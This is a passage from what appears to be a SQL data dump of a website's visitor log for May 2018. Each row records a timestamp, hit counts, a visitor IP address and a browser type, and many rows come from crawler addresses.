46','chrome'),(241963,1525758333,1,1,0,0,'54.36.148.176','other'),(241964,1525758434,1,1,0,0,'54.36.148.228','other'),(241965,1525758575,2,2,0,0,'35.201.7.150','other'),(241966,1525758576,1,1,0,0,'54.36.149.16','other'),(241967,1525758587,1,1,0,0,'54.36.149.104','other'),(241968,1525758635,1,1,0,0,'91.124.182.170','firefox'),(241969,1525758674,1,1,0,0,'54.36.149.88','other'),(241970,1525759064,1,1,0,0,'216.244.66.237','other'),(241971,1525759071,1,1,0,0,'91.196.178.133','chrome'),(241972,1525759226,3,3,0,0,'94.127.186.6','chrome'),(241973,1525759345,1,1,0,0,'149.202.205.113','chrome'),(241974,1525759464,1,1,0,0,'54.36.149.33','other'),(241975,1525759478,8,8,0,0,'91.196.178.81','chrome'),(241976,1525759637,1,1,0,0,'107.167.116.52','other'),(241977,1525759788,1,1,0,0,'159.100.183.147','chrome'),(241978,1525759829,2,2,0,0,'195.230.119.59','chrome'),(241979,1525759890,1,1,0,0,'54.36.149.36','other'),(241980,1525760273,1,1,0,0,'54.36.148.204','other'),(241981,1525760378,1,1,0,0,'54.36.148.168','other'),(241982,1525760417,1,1,0,0,'8.29.198.27','other'),(241983,1525760458,1,1,0,0,'95.132.45.144','firefox'),(241984,1525760589,2,2,0,0,'213.159.215.202','chrome'),(241985,1525760631,1,1,0,0,'54.36.148.229','other'),(241986,1525760679,1,1,0,0,'103.227.176.8','chrome'),(241987,1525760934,41,41,0,0,'167.114.219.41','other'),(241988,1525761053,1,1,0,0,'54.36.149.97','other'),(241989,1525761083,1,1,0,0,'54.36.149.54','other'),(241990,1525761374,1,1,0,0,'178.154.171.88','other'),(241991,1525761602,1,1,0,0,'54.36.148.52','other'),(241992,1525761663,1,1,0,0,'141.8.132.19','other'),(241993,1525761679,1,1,0,0,'54.36.149.57','other'),(241994,1525761889,1,1,0,0,'54.36.148.159','other'),(241995,1525761891,1,1,0,0,'54.36.148.12','other'),(241996,1525762335,95,95,0,0,'173.208.206.50','other'),(241997,1525762536,1,1,0,0,'54.36.149.0','other'),(241998,1525762575,1,1,0,0,'54.36.148.176','other'),(241999,1525762635,1,1,0,0,'95.135.21.157','chrome'),(242000,1525762653,1,1,0,0,'157.55.39.58','other'),(242001,1525762841,1,1,0,0,'37.73.254.180','chrome'),(242002,1525763275,1,1,0,0,'54.36.148.127','other'),(242003,1525763393,1,1,0,0,'91.196.178.66','chrome'),(242004,1525763561,1,1,0,0,'93.125.99.84','chrome'),(242005,1525763651,1,1,0,0,'54.36.148.195','other'),(242006,1525764119,3,3,0,0,'151.80.218.210','chrome'),(242007,1525764250,1,1,0,0,'54.36.149.79','other'),(242008,1525764547,1,1,0,0,'54.36.149.102','other'),(242009,1525764566,2,2,0,0,'216.244.66.237','other'),(242010,1525764568,1,1,0,0,'31.31.77.86','chrome'),(242011,1525764774,1,1,0,0,'54.36.148.199','other'),(242012,1525764824,1,1,0,0,'54.36.148.156','other'),(242013,1525764874,2,2,0,0,'72.52.133.20','chrome'),(242014,1525765035,1,1,0,0,'54.36.148.24','other'),(242015,1525765265,2,2,0,0,'78.46.98.216','chrome'),(242016,1525765480,1,1,0,0,'54.36.148.48','other'),(242017,1525765515,1,1,0,0,'54.36.148.84','other'),(242018,1525765545,1,1,0,0,'216.244.66.237','other'),(242019,1525765548,1,1,0,0,'54.36.148.108','other'),(242020,1525765624,1,1,0,0,'54.36.148.90','other'),(242021,1525765824,1,1,0,0,'54.36.148.157','other'),(242022,1525765850,1,1,0,0,'54.36.148.123','other'),(242023,1525765972,1,1,0,0,'8.29.198.25','other'),(242024,1525766013,1,1,0,0,'176.31.126.110','chrome'),(242025,1525766068,3,3,0,0,'204.12.208.10','other'),(242026,1525766106,1,1,0,0,'54.36.149.7','other'),(242027,1525766422,3,3,0,0,'91.196.178.3','chrome'),(242028,1525766501,1,1,0,0,'216.244.66.237','other'),(242029,1525766640,3,3,0,0,'94.127.186.6','chrome'),(242030,1525766755,1,1,0,0,'54.36.148.56','other'),(242031,1525766803,1,1,0,0,'54.36.148.34','other'),(242032,1525766836,1,1,0,0,'54.36.148.10','other'),(242033,1525766988,1,1,0,0,'54.36.148.186','other'),(242034,1525767155,1,1,0,0,'54.36.149.19','other'),(242035,1525767156,1,1,0,0,'54.36.149.42','other'),(242036,1525767174,2,2,0,0,'91.196.178.165','chrome'),(242037,1525767253,1,1,0,0,'37.52.23.46','chrome'),(242038,1525767402,1,1,0,0,'54.36.148.255','other'),(242039,1525767509,1,1,0,0,'54.36.148.245','other'),(242040,1525767638,1,1,0,0,'54.36.148.87','other'),(242041,1525767816,1,1,0,0,'54.36.148.41','other'),(242042,1525767846,2,2,0,0,'186.202.126.163','chrome'),(242043,1525768068,1,1,0,0,'54.36.148.238','other'),(242044,1525768151,1,1,0,0,'54.36.148.146','other'),(242045,1525768255,1,1,0,0,'103.227.176.8','chrome'),(242046,1525768390,1,1,0,0,'89.140.72.84','chrome'),(242047,1525768532,1,1,0,0,'54.36.148.171','other'),(242048,1525768558,2,2,0,0,'91.196.178.81','chrome'),(242049,1525768624,1,1,0,0,'54.36.148.59','other'),(242050,1525768626,1,1,0,0,'54.36.149.75','other'),(242051,1525768758,1,1,0,0,'54.36.149.22','other'),(242052,1525768900,2,2,0,0,'91.196.178.169','chrome'),(242053,1525768921,1,1,0,0,'37.73.220.186','chrome'),(242054,1525768928,1,1,0,0,'54.36.148.208','other'),(242055,1525768979,1,1,0,0,'54.36.149.67','other'),(242056,1525769412,1,1,0,0,'91.196.178.129','firefox'),(242057,1525769540,1,1,0,0,'62.80.178.142','chrome'),(242058,1525770319,1,1,0,0,'40.77.167.49','other'),(242059,1525770552,1,1,0,0,'54.36.148.43','other'),(242060,1525770689,1,1,0,0,'54.36.148.103','other'),(242061,1525770936,2,2,0,0,'216.244.66.237','other'),(242062,1525771245,1,1,0,0,'8.29.198.27','other'),(242063,1525771326,1,1,0,0,'54.36.148.117','other'),(242064,1525771677,1,1,0,0,'54.36.148.52','other'),(242065,1525772019,1,1,0,0,'54.36.148.209','other'),(242066,1525772181,1,1,0,0,'54.36.148.40','other'),(242067,1525772345,1,1,0,0,'37.144.43.192','firefox'),(242068,1525772409,2,2,0,0,'91.196.178.81','chrome'),(242069,1525772459,1,1,0,0,'95.67.22.207','chrome'),(242070,1525772642,1,1,0,0,'54.36.148.10','other'),(242071,1525772777,1,1,0,0,'54.36.149.97','other'),(242072,1525772813,1,0,1,0,'66.249.66.75',''),(242073,1525772871,1,1,0,0,'40.77.167.49','other'),(242074,1525772924,1,0,1,0,'66.249.66.76',''),(242075,1525773294,1,1,0,0,'54.36.149.70','other'),(242076,1525773524,1,1,0,0,'89.162.170.138','firefox'),(242077,1525773540,1,1,0,0,'54.36.148.158','other'),(242078,1525773584,1,1,0,0,'54.36.148.113','other'),(242079,1525773727,1,1,0,0,'216.244.66.237','other'),(242080,1525773936,1,1,0,0,'54.36.148.131','other'),(242081,1525773952,1,1,0,0,'54.36.149.84','other'),(242082,1525773999,1,1,0,0,'54.36.148.161','other'),(242083,1525774066,1,1,0,0,'77.111.244.15','chrome'),(242084,1525774152,1,1,0,0,'91.210.250.222','chrome'),(242085,1525774500,1,1,0,0,'54.36.148.198','other'),(242086,1525774502,1,1,0,0,'54.36.148.67','other'),(242087,1525774521,1,1,0,0,'54.36.148.213','other'),(242088,1525774529,1,1,0,0,'37.9.113.151','other'),(242089,1525774729,1,1,0,0,'54.36.148.225','other'),(242090,1525774933,1,1,0,0,'37.73.151.231','other'),(242091,1525775257,1,1,0,0,'54.36.149.107','other'),(242092,1525775260,1,1,0,0,'141.8.142.74','other'),(242093,1525775321,1,1,0,0,'157.55.39.58','other'),(242094,1525775534,1,1,0,0,'94.179.132.30','chrome'),(242095,1525775559,1,1,0,0,'54.36.148.99','other'),(242096,1525775768,2,2,0,0,'178.154.171.88','other'),(242097,1525775991,1,1,0,0,'77.81.120.20','chrome'),(242098,1525776012,2,2,0,0,'80.87.203.2','chrome'),(242099,1525776277,1,1,0,0,'54.36.148.184','other'),(242100,1525776420,2,2,0,0,'54.36.148.13','other'),(242101,1525776569,1,1,0,0,'54.36.148.197','other'),(242102,1525776803,1,1,0,0,'8.29.198.27','other'),(242103,1525776860,1,1,0,0,'216.244.66.237','other'),(242104,1525777365,1,1,0,0,'80.252.155.198','firefox'),(242105,1525777518,1,1,0,0,'54.36.148.231','other'),(242106,1525777745,2,2,0,0,'94.73.147.226','chrome'),(242107,1525777774,1,1,0,0,'103.227.176.8','chrome'),(242108,1525777847,1,1,0,0,'54.36.148.246','other'),(242109,1525778047,1,1,0,0,'54.36.148.78','other'),(242110,1525778147,1,1,0,0,'91.196.178.129','firefox'),(242111,1525778159,1,1,0,0,'54.36.148.207','other'),(242112,1525778222,1,1,0,0,'54.36.148.215','other'),(242113,1525778396,1,1,0,0,'54.36.148.188','other'),(242114,1525778562,1,1,0,0,'40.77.167.198','other'),(242115,1525778569,1,1,0,0,'178.154.171.88','other'),(242116,1525778654,1,1,0,0,'54.36.149.7','other'),(242117,1525778668,2,2,0,0,'91.196.178.28','chrome'),(242118,1525778890,1,1,0,0,'91.196.178.97','chrome'),(242119,1525779385,1,1,0,0,'46.161.9.39','chrome'),(242120,1525779408,1,1,0,0,'54.36.148.192','other'),(242121,1525779643,3,3,0,0,'178.32.13.93','chrome'),(242122,1525779694,2,2,0,0,'91.196.178.81','chrome'),(242123,1525779832,2,2,0,0,'217.61.0.54','chrome'),(242124,1525779838,1,1,0,0,'54.36.148.23','other'),(242125,1525779910,1,1,0,0,'54.36.149.28','other'),(242126,1525779921,1,1,0,0,'54.36.149.99','other'),(242127,1525779940,2,2,0,0,'151.80.199.98','chrome'),(242128,1525779949,1,1,0,0,'54.36.148.58','other'),(242129,1525780006,1,1,0,0,'54.36.148.205','other'),(242130,1525780181,1,1,0,0,'37.115.191.86','firefox'),(242131,1525780251,1,1,0,0,'54.36.148.51','other'),(242132,1525780358,1,1,0,0,'54.36.148.186','other'),(242133,1525780541,1,1,0,0,'54.36.149.23','other'),(242134,1525780747,1,1,0,0,'193.106.30.99','firefox'),(242135,1525780953,1,1,0,0,'82.207.58.252','chrome'),(242136,1525781013,1,1,0,0,'94.153.229.229','chrome'),(242137,1525781288,1,1,0,0,'91.227.16.127','chrome'),(242138,1525781449,1,1,0,0,'141.8.142.74','other'),(242139,1525781917,1,1,0,0,'54.36.149.64','other'),(242140,1525781996,1,1,0,0,'216.244.66.237','other'),(242141,1525782100,1,1,0,0,'8.29.198.25','other'),(242142,1525782578,1,1,0,0,'54.36.148.59','other'),(242143,1525782685,1,1,0,0,'62.146.152.18','chrome'),(242144,1525782894,1,1,0,0,'217.69.133.4','other'),(242145,1525782900,1,1,0,0,'217.69.134.220','other'),(242146,1525783126,2,2,0,0,'212.90.169.167','chrome'),(242147,1525783501,1,1,0,0,'54.36.149.83','other'),(242148,1525783745,1,1,0,0,'54.36.149.98','other'),(242149,1525783758,1,1,0,0,'54.36.148.38','other'),(242150,1525783768,1,1,0,0,'178.154.171.88','other'),(242151,1525784095,1,1,0,0,'54.36.149.9','other'),(242152,1525784268,1,1,0,0,'54.36.148.37','other'),(242153,1525784345,1,1,0,0,'94.179.33.133','firefox'),(242154,1525784557,1,1,0,0,'54.36.148.119','other'),(242155,1525784773,1,1,0,0,'178.93.239.218','chrome'),(242156,1525784807,1,1,0,0,'54.36.149.15','other'),(242157,1525785275,1,1,0,0,'54.36.148.73','other'),(242158,1525785292,1,1,0,0,'54.36.148.185','other'),(242159,1525785294,1,1,0,0,'54.36.148.78','other'),(242160,1525785601,1,1,0,0,'54.36.148.199','other'),(242161,1525785782,1,1,0,0,'54.36.149.90','other'),(242162,1525786001,1,1,0,0,'54.36.148.182','other'),(242163,1525786205,1,1,0,0,'54.36.148.113','other'),(242164,1525786248,1,1,0,0,'54.36.148.131','other'),(242166,1525786642,2,2,0,0,'212.90.169.167','chrome'),(242167,1525787379,1,1,0,0,'54.36.149.47','other'),(242168,1525787653,1,1,0,0,'8.29.198.25','other'),(242169,1525787797,1,1,0,0,'54.36.148.140','other'),(242170,1525788507,2,2,0,0,'40.77.167.49','other'),(242171,1525788641,1,1,0,0,'54.36.148.100','other'),(242172,1525788695,1,1,0,0,'54.36.149.34','other'),(242173,1525788728,1,1,0,0,'54.36.148.156','other'),(242174,1525788771,1,1,0,0,'54.36.148.201','other'),(242175,1525788780,1,1,0,0,'46.161.9.39','firefox'),(242176,1525788794,1,1,0,0,'54.36.148.237','other'),(242177,1525788805,1,1,0,0,'54.36.148.162','other'),(242178,1525789021,1,1,0,0,'87.250.224.46','other'),(242179,1525789176,1,1,0,0,'77.109.20.226','chrome'),(242180,1525789238,1,1,0,0,'54.36.148.153','other'),(242181,1525789287,1,1,0,0,'54.36.148.13','other'),(242182,1525789750,1,1,0,0,'54.36.148.151','other'),(242183,1525789806,1,1,0,0,'138.201.163.62','chrome'),(242184,1525790345,1,1,0,0,'54.36.148.240','other'),(242185,1525790526,1,1,0,0,'216.244.66.237','other'),(242186,1525790607,1,1,0,0,'54.36.148.180','other'),(242187,1525790749,1,1,0,0,'107.167.105.25','other'),(242188,1525790780,1,1,0,0,'54.36.149.87','other'),(242189,1525790844,1,1,0,0,'188.230.43.254','other'),(242190,1525790957,1,1,0,0,'54.36.148.200','other'),(242191,1525791038,1,1,0,0,'54.36.148.198','other'),(242192,1525791130,1,1,0,0,'46.211.148.155','other'),(242193,1525791367,1,1,0,0,'46.211.146.10','other'),(242194,1525791518,1,1,0,0,'216.244.66.237','other'),(242195,1525791556,1,1,0,0,'46.211.103.212','other'),(242196,1525792044,1,1,0,0,'54.36.148.172','other'),(242197,1525792453,1,1,0,0,'54.36.148.149','other'),(242198,1525792612,1,1,0,0,'54.36.149.14','other'),(242199,1525792668,1,1,0,0,'107.167.109.75','other'),(242200,1525792700,1,1,0,0,'54.36.148.126','other'),(242201,1525792732,1,1,0,0,'54.36.148.219','other'),(242202,1525792933,1,1,0,0,'8.29.198.27','other'),(242203,1525792953,1,1,0,0,'66.249.66.157','chrome'),(242204,1525793228,1,1,0,0,'54.36.148.45','other'),(242205,1525793384,1,1,0,0,'54.36.148.103','other'),(242206,1525793511,1,1,0,0,'54.36.148.136','other'),(242207,1525793532,1,1,0,0,'188.230.43.254','other'),(242208,1525793593,1,1,0,0,'46.211.146.10','other'),(242209,1525793629,1,1,0,0,'54.36.148.210','other'),(242210,1525793736,2,2,0,0,'178.92.84.197','chrome'),(242211,1525793752,1,1,0,0,'108.59.8.70','other'),(242212,1525793846,1,0,1,0,'66.249.66.75',''),(242213,1525793855,1,1,0,0,'54.36.149.44','other'),(242214,1525794168,1,1,0,0,'54.36.148.109','other'),(242215,1525794253,1,1,0,0,'54.36.148.174','other'),(242216,1525794397,1,1,0,0,'54.36.148.239','other'),(242217,1525794412,1,1,0,0,'54.36.149.25','other'),(242218,1525794493,1,1,0,0,'54.36.148.43','other'),(242219,1525794906,1,1,0,0,'54.36.148.198','other'),(242220,1525795246,1,1,0,0,'54.36.149.93','other'),(242221,1525795588,2,2,0,0,'216.244.66.237','other'),(242222,1525795591,1,1,0,0,'188.230.43.254','other'),(242223,1525795719,6,6,0,0,'91.196.178.165','chrome'),(242224,1525795863,1,1,0,0,'78.111.190.107','firefox'),(242225,1525795896,1,1,0,0,'54.36.148.183','other'),(242226,1525796164,1,0,1,0,'66.249.66.76',''),(242227,1525796335,1,1,0,0,'54.36.148.191','other'),(242228,1525796518,1,0,1,0,'66.249.66.157',''),(242229,1525796693,1,1,0,0,'91.196.178.161','chrome'),(242230,1525797060,1,1,0,0,'54.36.149.40','other'),(242231,1525797127,1,1,0,0,'54.36.148.45','other'),(242232,1525797160,1,1,0,0,'54.36.148.127','other'),(242233,1525797186,1,1,0,0,'54.36.148.249','other'),(242234,1525797862,2,2,0,0,'188.230.43.254','other'),(242235,1525798020,1,1,0,0,'66.249.66.155','chrome'),(242236,1525798095,1,1,0,0,'54.36.148.28','other'),(242237,1525798367,1,1,0,0,'207.46.13.50','other'),(242238,1525798488,1,1,0,0,'8.29.198.25','other'),(242239,1525798736,1,1,0,0,'141.8.142.74','other'),(242240,1525798914,1,1,0,0,'54.36.148.163','other'),(242241,1525799160,1,1,0,0,'54.36.148.32','other'),(242242,1525799384,1,1,0,0,'54.36.148.175','other'),(242243,1525799386,1,1,0,0,'54.36.148.134','other'),(242244,1525800263,1,1,0,0,'54.36.148.162','other'),(242245,1525800569,1,1,0,0,'193.106.30.99','firefox'),(242246,1525800744,1,1,0,0,'54.36.148.113','other'),(242247,1525800749,1,1,0,0,'54.36.149.102','other'),(242248,1525800822,1,1,0,0,'188.230.43.254','other'),(242249,1525800923,1,1,0,0,'54.36.149.91','other'),(242250,1525801117,1,0,1,0,'66.249.66.74',''),(242251,1525801158,1,1,0,0,'54.36.148.199','other'),(242252,1525801208,2,2,0,0,'178.154.171.88','other'),(242253,1525801445,1,1,0,0,'54.36.148.83','other'),(242254,1525801525,1,1,0,0,'54.36.148.193','other'),(242255,1525801696,1,1,0,0,'54.36.148.46','other'),(242256,1525801802,1,1,0,0,'54.36.149.15','other'),(242257,1525801849,1,1,0,0,'178.255.215.94','other'),(242258,1525802289,1,1,0,0,'54.36.149.23','other'),(242259,1525802443,1,1,0,0,'54.36.148.178','other'),(242260,1525802590,1,1,0,0,'54.36.149.48','other'),(242261,1525802790,1,1,0,0,'54.36.148.221','other'),(242262,1525803363,1,1,0,0,'54.36.148.186','other'),(242263,1525803458,1,1,0,0,'54.36.148.22','other'),(242264,1525803605,1,1,0,0,'54.36.149.37','other'),(242265,1525803788,1,1,0,0,'8.29.198.26','other'),(242266,1525803833,1,1,0,0,'54.36.148.36','other'),(242267,1525803961,1,1,0,0,'54.36.148.64','other'),(242268,1525804056,1,1,0,0,'54.36.148.104','other'),(242269,1525804144,1,1,0,0,'54.36.149.7','other'),(242270,1525804222,1,1,0,0,'54.36.148.27','other'),(242271,1525804628,1,1,0,0,'54.36.148.211','other'),(242272,1525804833,1,1,0,0,'54.36.148.131','other'),(242273,1525805128,1,1,0,0,'54.36.149.24','other'),(242274,1525805157,1,1,0,0,'91.196.178.39','chrome'),(242275,1525805231,1,1,0,0,'37.59.44.168','firefox'),(242276,1525805761,1,1,0,0,'52.91.128.120','other'),(242277,1525805929,1,1,0,0,'54.36.149.86','other'),(242278,1525806371,1,1,0,0,'54.36.148.120','other'),(242279,1525806475,1,1,0,0,'54.36.148.168','other'),(242280,1525806573,1,1,0,0,'54.36.148.53','other'),(242281,1525806663,2,2,0,0,'52.91.128.120','other'),(242282,1525806713,1,1,0,0,'91.196.178.66','firefox'),(242283,1525806757,1,1,0,0,'54.36.148.164','other'),(242284,1525807110,1,1,0,0,'54.36.148.116','other'),(242285,1525807270,1,1,0,0,'54.36.148.210','other'),(242286,1525807555,1,1,0,0,'217.69.134.175','other'),(242287,1525807566,1,1,0,0,'52.91.128.120','other'),(242288,1525807587,1,1,0,0,'54.36.148.88','other'),(242289,1525807602,1,1,0,0,'46.211.155.127','chrome'),(242290,1525807790,1,1,0,0,'217.69.134.200','other'),(242291,1525807957,1,1,0,0,'54.36.149.3','other'),(242292,1525808086,1,1,0,0,'217.69.134.174','other'),(242293,1525808204,1,1,0,0,'54.36.149.39','other'),(242294,1525808385,1,1,0,0,'54.36.148.169','other'),(242295,1525808468,1,1,0,0,'52.91.128.120','other'),(242296,1525808546,1,1,0,0,'217.69.133.3','other'),(242297,1525808579,1,1,0,0,'66.249.66.74','chrome'),(242298,1525808753,1,1,0,0,'54.36.148.172','other'),(242299,1525808997,1,1,0,0,'54.36.148.101','other'),(242300,1525809134,1,1,0,0,'217.69.134.154','other'),(242301,1525809178,1,1,0,0,'188.255.91.59','msie'),(242302,1525809320,1,1,0,0,'8.29.198.25','other'),(242303,1525809404,1,1,0,0,'52.91.128.120','other'),(242304,1525809628,1,1,0,0,'54.36.148.226','other'),(242305,1525809855,1,1,0,0,'217.69.133.9','other'),(242306,1525810236,1,1,0,0,'54.36.149.8','other'),(242307,1525810305,1,1,0,0,'52.91.128.120','other'),(242308,1525810591,1,1,0,0,'54.36.148.206','other'),(242309,1525810604,1,1,0,0,'54.36.148.119','other'),(242310,1525810876,2,2,0,0,'37.73.222.146','chrome'),(242311,1525810960,1,1,0,0,'54.36.148.150','other'),(242312,1525811060,1,1,0,0,'217.69.134.220','other'),(242313,1525811206,1,1,0,0,'52.91.128.120','other'),(242314,1525811524,1,1,0,0,'54.36.149.57','other'),(242315,1525811541,1,1,0,0,'54.36.148.21','other'),(242316,1525811672,1,1,0,0,'54.36.148.17','other'),(242317,1525811765,1,1,0,0,'217.69.133.4','other'),(242318,1525812109,1,1,0,0,'52.91.128.120','other'),(242319,1525812149,1,1,0,0,'40.77.167.49','other'),(242320,1525812171,1,1,0,0,'217.69.133.203','other'),(242321,1525812453,1,1,0,0,'217.69.134.177','other'),(242322,1525812506,1,1,0,0,'54.36.148.215','other'),(242323,1525812581,1,1,0,0,'54.36.149.63','other'),(242324,1525812588,1,1,0,0,'54.36.149.2','other'),(242325,1525812680,1,1,0,0,'54.36.149.8','other'),(242326,1525812889,1,1,0,0,'217.69.133.3','other'),(242327,1525812895,1,1,0,0,'54.36.148.127','other'),(242328,1525813010,1,1,0,0,'52.91.128.120','other'),(242329,1525813060,1,1,0,0,'217.69.134.155','other'),(242330,1525813093,1,1,0,0,'195.114.136.153','other'),(242331,1525813254,1,1,0,0,'217.69.133.6','other'),(242332,1525813340,1,1,0,0,'217.69.134.174','other'),(242333,1525813431,1,1,0,0,'217.69.133.2','other'),(242334,1525813513,1,1,0,0,'217.69.134.227','other'),(242335,1525813556,1,1,0,0,'54.36.148.210','other'),(242336,1525813597,1,1,0,0,'217.69.134.177','other'),(242337,1525813681,1,1,0,0,'217.69.134.176','other'),(242338,1525813761,1,1,0,0,'193.106.30.99','firefox'),(242339,1525813763,1,1,0,0,'217.69.133.5','other'),(242340,1525813911,1,1,0,0,'52.91.128.120','other'),(242341,1525813967,1,1,0,0,'54.36.149.95','other'),(242342,1525814023,1,1,0,0,'54.36.148.128','other'),(242343,1525814344,1,1,0,0,'54.36.148.89','other'),(242344,1525814563,1,1,0,0,'54.36.149.107','other'),(242345,1525814627,1,1,0,0,'8.29.198.27','other'),(242346,1525814812,1,1,0,0,'52.91.128.120','other'),(242347,1525814918,1,1,0,0,'54.36.149.41','other'),(242348,1525814945,1,1,0,0,'54.36.148.123','other'),(242349,1525815100,1,1,0,0,'54.36.148.181','other'),(242350,1525815194,1,1,0,0,'54.36.149.8','other'),(242351,1525815359,1,1,0,0,'54.36.148.31','other'),(242352,1525815491,1,1,0,0,'54.36.148.101','other'),(242353,1525815714,1,1,0,0,'52.91.128.120','other'),(242354,1525815780,1,1,0,0,'54.36.148.207','other'),(242355,1525816048,1,1,0,0,'185.105.89.38','chrome'),(242356,1525816063,1,1,0,0,'54.36.148.187','other'),(242357,1525816156,1,1,0,0,'54.36.149.31','other'),(242358,1525816351,1,1,0,0,'54.36.149.78','other'),(242359,1525816381,1,1,0,0,'54.36.149.72','other'),(242360,1525816616,1,1,0,0,'52.91.128.120','other'),(242361,1525816920,1,1,0,0,'54.36.148.195','other'),(242362,1525817132,1,1,0,0,'216.244.66.237','other'),(242363,1525817213,1,1,0,0,'207.46.13.50','other'),(242364,1525817586,1,1,0,0,'54.36.148.212','other'),(242365,1525817820,1,1,0,0,'54.36.148.137','other'),(242366,1525817840,1,1,0,0,'54.36.149.9','other'),(242367,1525817921,1,1,0,0,'51.15.83.34','other'),(242368,1525817946,1,1,0,0,'54.36.149.96','other'),(242369,1525818216,1,1,0,0,'54.36.148.169','other'),(242370,1525818362,1,1,0,0,'54.36.149.35','other'),(242371,1525818466,1,1,0,0,'54.36.148.247','other'),(242372,1525818616,1,1,0,0,'54.36.149.4','other'),(242373,1525818790,1,1,0,0,'54.36.148.144','other'),(242374,1525819094,1,1,0,0,'54.36.148.194','other'),(242375,1525819320,1,1,0,0,'54.36.148.119','other'),(242376,1525819550,1,1,0,0,'54.36.148.174','other'),(242377,1525819840,1,1,0,0,'54.36.148.166','other'),(242378,1525819940,1,1,0,0,'54.36.149.9','other'),(242379,1525820016,1,1,0,0,'54.36.148.111','other'),(242380,1525820072,1,1,0,0,'54.36.148.155','other'),(242381,1525820139,1,1,0,0,'54.36.149.3','other'),(242382,1525820149,1,1,0,0,'8.29.198.26','other'),(242383,1525820329,1,1,0,0,'54.36.148.173','other'),(242384,1525820431,1,1,0,0,'54.36.148.145','other'),(242385,1525820477,1,1,0,0,'54.36.148.12','other'),(242386,1525821040,1,1,0,0,'54.36.149.44','other'),(242387,1525821589,1,1,0,0,'54.36.148.130','other'),(242388,1525821599,1,1,0,0,'178.154.171.88','other'),(242389,1525821769,1,1,0,0,'54.36.148.79','other'),(242390,1525821990,1,1,0,0,'54.36.148.228','other'),(242391,1525822347,1,1,0,0,'54.36.148.192','other'),(242392,1525822500,1,1,0,0,'81.88.49.28','chrome'),(242394,1525822534,1,1,0,0,'81.88.49.42','chrome'),(242395,1525822646,1,1,0,0,'54.36.148.145','other'),(242396,1525822831,1,1,0,0,'54.36.148.72','other'),(242397,1525822871,1,1,0,0,'54.36.148.29','other'),(242398,1525823079,1,1,0,0,'54.36.148.55','other'),(242399,1525823469,1,1,0,0,'54.36.149.17','other'),(242400,1525823525,1,1,0,0,'54.36.149.106','other'),(242401,1525823841,1,1,0,0,'178.154.171.88','other'),(242402,1525823877,1,1,0,0,'54.36.148.206','other'),(242403,1525824349,1,1,0,0,'54.36.148.36','other'),(242404,1525824354,1,1,0,0,'141.8.142.74','other'),(242405,1525824789,1,1,0,0,'54.36.149.44','other'),(242406,1525824847,1,1,0,0,'54.36.148.111','other'),(242407,1525824958,1,1,0,0,'87.250.224.46','other'),(242408,1525825460,1,1,0,0,'8.29.198.27','other'),(242409,1525825503,1,0,1,0,'66.249.66.74',''),(242410,1525825609,1,1,0,0,'46.161.9.39','chrome'),(242411,1525825975,1,1,0,0,'37.9.113.101','other'),(242412,1525826137,1,1,0,0,'54.36.149.53','other'),(242413,1525826364,1,1,0,0,'54.36.148.108','other'),(242414,1525826816,1,1,0,0,'54.36.148.212','other'),(242415,1525826990,1,1,0,0,'54.36.148.85','other'),(242416,1525827001,1,1,0,0,'66.249.66.75','chrome'),(242417,1525827097,1,1,0,0,'54.36.149.8','other'),(242418,1525827525,1,1,0,0,'37.9.113.182','other'),(242419,1525827790,1,1,0,0,'54.36.149.76','other'),(242420,1525827853,1,1,0,0,'178.154.171.88','other'),(242421,1525827893,1,1,0,0,'54.36.148.33','other'),(242422,1525828132,1,1,0,0,'54.36.149.67','other'),(242423,1525828614,3,3,0,0,'54.165.59.7','other'),(242424,1525828652,1,1,0,0,'54.36.148.51','other'),(242425,1525828943,1,1,0,0,'54.36.149.72','other'),(242426,1525828953,1,1,0,0,'54.36.148.137','other'),(242427,1525829553,1,1,0,0,'54.36.148.226','other'),(242428,1525829732,1,1,0,0,'54.36.148.79','other'),(242429,1525829742,1,1,0,0,'54.36.149.83','other'),(242430,1525830305,1,1,0,0,'54.36.149.21','other'),(242431,1525830462,1,1,0,0,'54.36.148.73','other'),(242432,1525830683,1,1,0,0,'54.36.149.41','other'),(242433,1525830727,1,1,0,0,'87.250.224.46','other'),(242434,1525830756,1,1,0,0,'54.36.149.49','other'),(242435,1525830989,1,1,0,0,'8.29.198.26','other'),(242436,1525831024,1,1,0,0,'54.36.148.187','other'),(242437,1525831228,1,1,0,0,'37.9.113.182','other'),(242438,1525831284,1,1,0,0,'54.36.149.56','other'),(242439,1525831450,1,1,0,0,'54.36.148.218','other'),(242440,1525831517,1,1,0,0,'40.77.167.49','other'),(242441,1525831555,1,1,0,0,'54.165.59.7','other'),(242442,1525831810,1,1,0,0,'54.36.149.23','other'),(242443,1525832416,1,1,0,0,'54.36.148.156','other'),(242444,1525833187,1,1,0,0,'157.55.39.58','other'),(242445,1525833250,1,1,0,0,'54.36.149.42','other'),(242446,1525833306,1,1,0,0,'207.46.13.50','other'),(242447,1525833370,1,1,0,0,'178.154.171.88','other'),(242448,1525833634,1,1,0,0,'54.36.149.26','other'),(242449,1525833659,1,1,0,0,'54.36.148.59','other'),(242450,1525833705,1,1,0,0,'91.209.11.236','other'),(242451,1525833838,1,1,0,0,'54.165.59.7','other'),(242452,1525833849,1,1,0,0,'54.36.148.224','other'),(242453,1525834024,1,1,0,0,'54.36.148.182','other'),(242454,1525834586,1,1,0,0,'54.36.149.66','other'),(242455,1525834638,1,1,0,0,'54.36.148.27','other'),(242456,1525834740,1,1,0,0,'54.36.148.179','other'),(242457,1525835059,1,1,0,0,'54.36.148.172','other'),(242458,1525835125,1,1,0,0,'54.36.149.64','other'),(242459,1525835969,1,1,0,0,'54.36.148.48','other'),(242460,1525835982,1,1,0,0,'193.106.30.99','firefox'),(242461,1525836276,1,1,0,0,'216.244.66.237','other'),(242462,1525836308,1,1,0,0,'8.29.198.27','other'),(242463,1525836458,1,1,0,0,'141.8.142.74','other'),(242464,1525836611,1,1,0,0,'180.76.15.153','other'),(242465,1525837437,3,3,0,0,'141.8.142.74','other'),(242466,1525837858,1,1,0,0,'87.250.224.46','other'),(242467,1525838180,1,1,0,0,'37.115.191.86','firefox'),(242468,1525838190,1,1,0,0,'54.36.148.230','other'),(242469,1525838216,1,1,0,0,'54.36.149.1','other'),(242470,1525838634,1,1,0,0,'54.36.148.98','other'),(242471,1525838692,1,1,0,0,'54.36.149.37','other'),(242472,1525838898,1,1,0,0,'178.154.171.88','other'),(242473,1525839435,1,1,0,0,'54.36.149.34','other'),(242474,1525839606,1,1,0,0,'54.36.148.156','other'),(242475,1525839964,1,1,0,0,'178.154.171.88','other'),(242476,1525840308,7